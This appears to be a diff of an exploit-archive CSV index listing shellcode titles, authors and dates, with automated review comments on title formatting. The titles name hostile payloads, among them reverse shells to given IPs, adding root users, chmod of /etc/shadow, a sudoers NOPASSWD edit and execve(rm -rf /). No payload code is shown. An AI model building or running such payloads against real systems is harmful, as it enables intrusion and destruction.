13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
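Review bot: the " + " separator is added to 13260 ("+ ToUpper Encoded") and 13266 ("+ Null-Free") but not to rows of the same shape in this hunk: 13261 ("execve(/bin/sh) Anti-Debugging Shellcode") and 13269 ("execve(/bin/sh) Encoded Shellcode"). Either normalise those as well or state the rule for when a modifier gets a separator.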
@ -38,14 +38,14 @@ id,file,description,date,author,type,platform
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13281,shellcodes/generator/13281.c,"Linux/x86 - execve() Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
13281,shellcodes/generator/13281.c,"Linux/x86 - execve() + Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13284,shellcodes/generator/13284.txt,"Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator + Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
13288,shellcodes/generator/13288.c,"Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)",2006-10-22,izik,shellcode,generator
13289,shellcodes/generator/13289.c,"Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
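Review bot: the 13288 rename replaces the leading "(Generator)" with "Linux/x86", a platform claim the old title did not carry; check it against 13288.c before merging. In the same hunk, 13290 ("iOS Version-independent - Null-Free Shellcode") is left outside the "Platform - Feature + Modifier Shellcode" pattern that the other rows are being moved to.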
@ -82,17 +82,17 @@ id,file,description,date,author,type,platform
13324,shellcodes/linux_x86/13324.c,"Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)",2009-02-27,certaindeath,shellcode,linux_x86
13325,shellcodes/linux_x86/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",shellcode,linux_x86
13326,shellcodes/linux_x86/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",shellcode,linux_x86
13327,shellcodes/linux_x86/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
13327,shellcodes/linux_x86/13327.c,"Linux/x86 - reboot() + PUSH Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
13331,shellcodes/linux_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,linux_x86
13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,linux_x86
13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86
13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86
13334,shellcodes/linux_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,linux_x86
13335,shellcodes/linux_x86/13335.c,"Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,linux_x86
13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86
13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86
13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86
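Review bot: 13337 is changed from "Reverse Connection" to "Reverse TCP", but 13265 in the -17,13 hunk still reads "Reverse Connection (172.17.0.9:8000/TCP)". Apply the same wording there so one search term finds both. The new 13328 title also ends in "+ Null-Free (Generator)" rather than the "+ Null-Free Shellcode (Generator)" ending given to 13281 and 13285.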
@ -101,7 +101,7 @@ id,file,description,date,author,type,platform
13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
13344,shellcodes/linux_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() + Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
13347,shellcodes/linux_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13348,shellcodes/linux_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13349,shellcodes/linux_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
@ -110,14 +110,14 @@ id,file,description,date,author,type,platform
13352,shellcodes/linux_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86
13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86
13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
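Review bot: in the 13362 row the rename keeps the misspelling "Diassembly" and splits "Diassembly Obfuscation" into "Diassembly + Obfuscation", so what the old title presents as one technique now reads as two separate features. Suggest "execve() + Disassembly Obfuscation Shellcode (32 bytes)".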
@ -136,22 +136,22 @@ id,file,description,date,author,type,platform
13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86
13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13386,shellcodes/linux_x86/13386.c,"Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13390,shellcodes/linux_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,linux_x86
13391,shellcodes/linux_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,linux_x86
13392,shellcodes/linux_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,linux_x86
13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86
13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
13396,shellcodes/linux_x86/13396.c,"Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
13397,shellcodes/linux_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,linux_x86
13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
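Review bot: in the 13384 row "+1 Encoded" becomes "+ 1 Encoded". If "+1" names the encoding, as the old title suggests, the plus sign now reads as the list separator followed by a stray "1"; keep "+1" as one token and put the separator in front of it. The new 13396 title also starts with a bare parenthetical, "(eax != 0 and edx == 0) + exit()", which no longer says what the condition applies to.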
@ -163,24 +163,24 @@ id,file,description,date,author,type,platform
13405,shellcodes/linux_x86/13405.c,"Linux/x86 - _exit(1) Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
13406,shellcodes/linux_x86/13406.c,"Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86
13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86
13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86
13410,shellcodes/linux_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,linux_x86
13411,shellcodes/linux_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,linux_x86
13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86
13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86
13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86
13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86
13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86
13416,shellcodes/linux_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,linux_x86
13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid() + execve() Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86
13418,shellcodes/linux_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,linux_x86
13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
13420,shellcodes/linux_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,linux_x86
13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86
13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86
13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86
13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
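Review bot: The rewritten 13425 line still uses the prefix "Linux/IA32" although its platform column is linux_x86 and every other linux_x86 entry in this hunk is titled "Linux/x86". Since the line is already being touched to add the "+" before "0xff-Free", the prefix should be normalised to "Linux/x86" in the same edit so that prefix-based searches and sorts do not miss this entry.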
@ -190,7 +190,7 @@ id,file,description,date,author,type,platform
13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86
13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86
13434,shellcodes/linux_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,linux_x86
13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
13437,shellcodes/linux_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13438,shellcodes/linux_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
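Review bot: The new 13435 description introduces a typo, "Telnet Shel Shellcode", which should read "Telnet Shell Shellcode". It also writes "(200.182.207.235/TCP)", putting the protocol suffix directly after an address with no port, whereas other reverse-shell entries in this file use the address:port/TCP form (13393 has "127.0.0.1:31337/TCP"). Either add the port in that form or drop the "/TCP" suffix so the field is not read as a port.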
@ -212,10 +212,10 @@ id,file,description,date,author,type,platform
13453,shellcodes/bsd_x86/13453.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,bsd_x86
13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86
13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
@ -238,118 +238,118 @@ id,file,description,date,author,type,platform
13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
